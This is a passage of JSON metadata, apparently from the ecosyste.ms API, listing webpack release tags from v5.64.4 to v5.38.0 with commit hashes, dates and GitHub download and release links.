osyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","p